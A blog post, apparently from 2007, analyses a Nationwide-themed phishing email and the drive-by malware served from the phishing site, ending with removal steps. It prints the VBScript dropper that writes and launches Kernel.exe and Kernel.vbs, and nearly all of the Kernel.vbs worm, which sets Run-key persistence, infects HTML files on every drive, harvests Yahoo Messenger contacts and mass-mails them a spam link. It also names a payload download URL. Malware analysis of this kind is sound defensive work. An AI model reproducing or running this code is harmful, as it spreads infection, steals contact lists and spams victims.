A phisherman writes…

Files involved in this: systems.exe, kernel.exe, kernel.vbs, systemv.dll, TSP32E.DLL, TSP32V.DLL. The following email has arrived:

Nationwide Logo

Dear Customer,

It has come to our attention that your Online account informations needs to be updated as part of our continuing commitment to protect your account and to reduce the instance of fraud on our website.

If you could please take 5-10 minutes out of your online experience and update your billing records so that you will not run into any future problems with our online banking service.

However, failure this will result in account suspension

http://www.nationwide.co.uk/update <<–don’t click!!! you divvy–>>

Nationwide Bank Plc
Security Advisor
Nationwide Bank PLC.


Please do not reply to this e-mail. Mail sent to this address cannot be answered.
For assistance, log in to your Nationwide Internet Bank account and choose the “Help” link on any page.

Nationwide Email ID # 1009

Lovely! I don’t even bank with Nationwide, but always happy to oblige, of course…

First off, the headers. This mail appears to originate from eta.easy-hebergement.net (eta.easy-hebergement.net [80.248.211.138]). This is webhosting in France.

One of the things that I find annoying about these phishing mails is the fact that I have yet to come across one that hasn’t got spelling errors and whatnot. Why can these jerks not even be bothered to spell correctly? Why is the population at large so illiterate that they cannot perceive these errors and be warned?

And do people not check links before clicking on them? But the page at http://vaxweb.net/modules/Feedback_eeez/online/infobox/ www.nationwide.co.uk/nationwide.co.uk/olb2.nationet.com/Updating /default1.aspID=381cfed80bc993c7a6e30a33cd7aec24f15.htm presumably looks realistic. Apart from the lengthy URL and the lack of HTTPS, I suppose. You can type some shit for username and password, and it duly sends it back.

They have left their directories browsable, so I browse a bit, and this drive-by download is what I get. Below is the page, complete with e-mail address for complaints etc:

HTTP/1.1 200 OK
Date: Sun, 17 Jun 2007 09:02:39 GMT
Server: Servage.net Cluster/(Enhanced Apache)
Last-Modified: Fri, 25 May 2007 02:40:49 GMT
ETag: “2880005-6ea0-46564cb1″
Accept-Ranges: bytes
Content-Length: 28320
Keep-Alive: timeout=5
Connection: Keep-Alive
Content-Type: text/html<!DOCTYPE HTML PUBLIC “-//W3C//DTD HTML 4.0 Transitional//EN”>
<!– saved from url=(0027)http://www.latef.net/image/ –>
<HTML dir=rtl><HEAD><TITLE>The HaCKerS Damn TeaM</TITLE>
<META http-equiv=Content-Type content=”text/html; charset=windows-1256″>
<STYLE type=text/css>BODY {
SCROLLBAR-FACE-COLOR: #000000; SCROLLBAR-HIGHLIGHT-COLOR: #ffffff; SCROLLBAR-SHADOW-COLOR: #000000; SCROLLBAR-3DLIGHT-COLOR: #000000; SCROLLBAR-ARROW-COLOR: #ffffff; SCROLLBAR-TRACK-COLOR: #000000; FONT-FAMILY: Verdana; SCROLLBAR-DARKSHADOW-COLOR: #ffffff
}
.Estilo10 {
COLOR: #ffffff; FONT-FAMILY: Haettenschweiler
}
.Estilo8 {
FONT-SIZE: 10px; COLOR: #ffffff; FONT-FAMILY: Haettenschweiler
}
</STYLE>
<!–
// please keep these lines on when you copy the source
// made by: Nicolas – http://www.javascript-page.com

var mymessage = “? “;

function rtclickcheck(keyp){
if (navigator.appName == “Netscape” && keyp.which == 3) {
alert(mymessage);
return false;
}

if (navigator.DR.Prr0bLeMwas’here.appVersion.indexOf(“MSIE”) != -1 && event.button == 2) {
alert(mymessage);
return false;
}
}

document.onmousedown = rtclickcheck
//–>
<META content=”MSHTML 6.00.2900.2802″ name=GENERATOR></HEAD>
<BODY text=#ff0000 vLink=#FF0000 aLink=#FF0000 link=#646464 bgColor=#000000
background=”silver.gif”>
<DIV dir=ltr align=center><SPAN
style=”FILTER: blur(add=1,direction=270,strength=30); HEIGHT: 30px”>
<DIV align=center>
<DIV dir=ltr align=center>
<SPAN
style=”FILTER: blur(add=1,direction=270,strength=30)”><NOBR>
<P align=center><B><A
style=”TEXT-DECORATION: none” href=”mailto:[email protected]”>
<FONT
color=#00ffff style=”font-size: 70pt” face=”Comic Sans MS”><SPAN lang=ar-sa>&nbsp;</SPAN></FONT><SPAN lang=ar-sa><FONT face=”Castellar” size=”7″><FONT color=#0099FF>s</FONT><FONT color=#FFFFFF>aud</FONT><FONT color=#0099FF>i</FONT></FONT><font face=”Castellar” size=”7″ color=”#FFFFFF”>.</font><font face=”Castellar” size=”7″ color=”#0099FF”>h</font><font face=”Castellar” size=”7″ color=”#FFFFFF”>ekra</font><font face=”Castellar” size=”7″ color=”#0099FF”>z</font><FONT color=#00FFFF style=”font-size: 70pt” face=”Comic Sans MS”><br>
&nbsp;</FONT></SPAN></A></B></P>
<P align=center><B><FONT face=”Castellar” size=”5″><A
style=”TEXT-DECORATION: none” href=”mailto:[email protected]”><SPAN lang=ar-sa><FONT color=#0099FF>s</FONT><FONT color=#FFFFFF>a</FONT></SPAN></A></FONT><A
style=”TEXT-DECORATION: none” href=”mailto:[email protected]”><SPAN lang=ar-sa><FONT face=”Castellar” size=”5″ color=”#FFFFFF”>ud</FONT><FONT color=#0099FF face=”Castellar” size=”5″>i</FONT><FONT color=#FFFFFF face=”Castellar” size=”5″>.</FONT><FONT color=#0099FF face=”Castellar” size=”5″>h</FONT><FONT color=#FFFFFF face=”Castellar” size=”5″>ekra</FONT><FONT color=#0099FF face=”Castellar” size=”5″>z</FONT></SPAN></A><font face=”Castellar” size=”5″ color=”#FFFFFF”>@</font><font color=”#0099FF” face=”Castellar” size=”5″>h</font><font face=”Castellar” size=”5″ color=”#FFFFFF”>otmai</font><font color=”#0099FF” face=”Castellar” size=”5″>l</font><font face=”Castellar” size=”5″ color=”#FFFFFF”>.</font><font color=”#0099FF” face=”Castellar” size=”5″>c</font><font face=”Castellar” size=”5″ color=”#FFFFFF”>o</font><font color=”#0099FF” face=”Castellar” size=”5″>m</font></B></P><B>
<P align=center><FONT color=#33cc33><FONT face=”Comic Sans MS”
color=#ffffff size=5>S</FONT><FONT face=”Comic Sans MS” size=5><FONT
color=#0099ff>ee</FONT> <FONT
color=#ffffff>y</FONT><FONT
color=#0099ff>ou</FONT></FONT></P></FONT></B></NOBR></SPAN>
<P align=center><SPAN
style=”FILTER: blur(add=1,direction=270,strength=30)”><FONT face=”Comic Sans MS”
color=#ffffff size=2>
<EMBED name=video0 pluginspage=http://www.real.com/player/
src=http://www.6rb.com/song4/kw/thuwa7y/thuwa7y-la_kha6-samra.ram width=165 height=62 true
type=audio/x-pn-realaudio-plugin loop=”true” autostart=”true” nojava=”true”
controls=”ControlPanel,StatusBar” maintainaspect=”false” hidden></FONT></SPAN><SPAN
lang=ar-sa><FONT face=”Comic Sans MS” color=#00ff00 size=6>
</FONT></SPAN></P></DIV></DIV></SPAN></DIV></BODY></HTML>

<script language=vbscript>
on error resume next
fileexe1=”077090144000003000000000004000000000255255000000184000000000000000000000064000000000000000000000000000000000 (.. and so forth)

filevbs1=”039078097118105100032110101119032118105114117115032050048048054040049051055053046049041013010111110032101114 (..and so forth)

dim sys
Set df = document.createElement(“object”)
df.setAttribute “classid”, “clsid:BD96C556-65A3-11D0-983A-00C04FC29E36 ”
set fso = df.createobject(“Scripting.FileSystemObject”,””)
set s=df.CreateObject(“Shell.Application.1″,””)
set re=df.createobject(“wscript.shell”,””)
sys=fso.GetSpecialFolder(1)
For a = 1 To Len(filevbs1) Step 3
filevbs2=filevbs2 & chr(mid(filevbs1,a,3))
if a < len(fileexe1)+1 then fileexe2=fileexe2 & chr(mid(fileexe1,a,3))
next
fso.CreateTextFile(sys & “\TSP32E.DLL”).write fileexe1
if fso.opentextfile(sys & “\Systeme.dll”).readall<>”on” then
fso.CreateTextFile(sys & “\Kernel.exe”).write fileexe2
s.Open (sys & “\Kernel.exe”)
end if
fso.CreateTextFile(sys & “\TSP32V.DLL”).write filevbs1
if fso.opentextfile(sys & “\Systemv.dll”).readall<>”on” then
fso.CreateTextFile(sys & “\Kernel.vbs”).write filevbs2
s.Open (sys & “\Kernel.vbs”)
end if
</script>

This creates a couple of files in the windows\system32 directory which are set to run straight away.

Below is Kernel.vbs. Navid has proper cheek calling this lame little piece of shite a virus! But presumably this twat has no other means of getting punters to click on his sexy girl websait. And yahoo… always bastard yahoo… My Virtual Server doesn’t have any yahoo stuff on it, so the efficacy of this mailer is untested.

‘Navid new virus 2006(1375.1)
on error resume next
dim filehtm,sys,yr
filehtm1=”10010510903211512111501301008310111603210010203206103210011109911710910111011604609911 (long thing here cut down)set fso=createobject(“scripting.filesystemobject”)
set re=createobject(“wscript.shell”)
sys=fso.GetSpecialFolder(1)
fso.CreateTextFile(sys & “\Systemv.dll”).write “on”
filehtm=”<script language=vbscript>” & vbcrlf & “on error resume next” & vbcrlf
filehtm=filehtm & “fileexe1=””” & fso.opentextfile(sys & “\TSP32E.DLL”).readall & “””” & vbcrlf
filehtm=filehtm & “filevbs1=””” & fso.opentextfile(sys & “\TSP32V.DLL”).readall & “””” & vbcrlf
For a = 1 To Len(filehtm1) Step 3
filehtm=filehtm & chr(mid(filehtm1,a,3))
next
re.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\” & “Microsoft Windows” ,sys &”\Kernel.vbs”
re.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\” & “Microsoft Windows” ,sys &”\Kernel.exe”
yr=re.RegRead(“HKEY_CURRENT_USER\Software\yahoo\pager\Yahoo! User ID”)
start
Sub start()
on error resume next
For Each dr1 In fso.Drives
If dr1.DriveType = 2 Or dr1.DriveType = 3 Then file1 (dr1 & “\”): folder1 (dr1 & “\”)
Next
sendmail
End Sub
Sub folder1(dr1)
on error resume next
For Each fo In fso.GetFolder(dr1).SubFolders
if UCase(right(fo,25))=”YAHOO!\MESSENGER\PROFILES” then yahoo(fo)
file1 (fo)
folder1 (fo)
Next
End Sub
Sub file1(fo)
on error resume next
For Each fi In fso.GetFolder(fo).Files
nj (fi)
Next
End Sub
sub nj(fi)
on error resume next
ext=UCase(fso.GetExtensionName(fi))
if ext=”HTM” or ext=”HTML” or ext=”HTT” then
if right(fso.opentextfile(fi,1).readall,len(filehtm))<>filehtm then
fso.opentextfile(fi,8).write vbcrlf & filehtm
end if
end if
end sub
sub yahoo(foy1)
For Each foy2 In fso.GetFolder(foy1).SubFolders
mailall=mailall & fso.GetFileName(foy2) & “@yahoo.com” & vbcrlf
next
fso.createtextfile(sys & “\mail.log”).write mailall & “END”
fso.createtextfile(sys & “\send.log”).write yr & “@yahoo.com”
end sub
sub sendmail()
on error resume next
sendm=fso.opentextfile(sys & “\send.log”,1).readall
set mailm=fso.opentextfile(sys & “\mail.log”,1)
maila=mailm.readline
while maila <> “END”
Set objMessage = CreateObject(“CDO.Message”)
objMessage.Subject = “Hello”
objMessage.Sender = sendm
objMessage.from= sendm
objMessage.To = maila
objMessage.TextBody = “Hello” & vbcrlf & “Go to my sait: http://girlsex.webs.io/picture.htm”
objMessage.Send
maila=mailm.readline
wend
fso.CreateTextFile(sys & “\Systemv.dll”).write “off”
end sub

And what it wants is to go online again, this time visiting http://h1.ripway.com/dreamhack/H/Navidhack.exe. Again don’t fucking click. Because you’d be using all his bandwidth. The idea here is that the binary called Navidhack.exe is duly saved onto the hard drive under the name “systems.exe”. Unfortunately, all this free webhosting with their bleeding download limits makes this impossible. The file saved instead is the page telling that the limit has been exceeded:

<snip>
This user account has exceeded their daily bandwidth limit. If this is your account, you might consider upgrading to a premium plan, or reduce the number or size
of files you’re sharing online. As soon as the total downloads from this account over a 24 hour period drops below the
accounts limit, downloads will be restored.
</snip>

Sadly, this is not a program. So upon execution ntvmd.exe generates errors.

Saudi-hekraz

A little googling doesn’t really show up a lot. This lot of top hekras is presumably too 1337 to even have a web-presence… yeah right. Have a look at this google cache (the original page is http://asp1.umbc.edu/ute/projectvideo/forum/default.asp and at time of writing still affected but I dare say someone will have a go at restoring at some point): http://66.102.9.104/search?q=cache:5GXZvPtPNPAJ: asp1.umbc.edu/ute/projectvideo/forum/default.asp+saudi.hekraz& hl=en&ct=clnk&cd=2&gl=uk. This gives a pretty good idea what these little tits are all about. They know the little sql hack and now it’s gonzo woz ere all along. It reminds me of bus shelters that have been defaced by bored little skiving yoofs with black marker pens who need rounding up and putting against the wall. Tatatatata.

Removal

As you can see from the code, this thing inserts two entries into the registry. These will have to come out. Stop all the processes associated with the “virus” (kernel.exe, systems.exe, whatever) and delete them from the system32 directory. Quick, quick, they’re being recreated immediately. Then delete the two entries that were made:

re.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\" & "Microsoft Windows" ,sys &"\Kernel.vbs"
 re.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\" & "Microsoft Windows" ,sys &"\Kernel.exe"

Leave a Reply to This Post!

Your email address will not be published. Required fields are marked *

*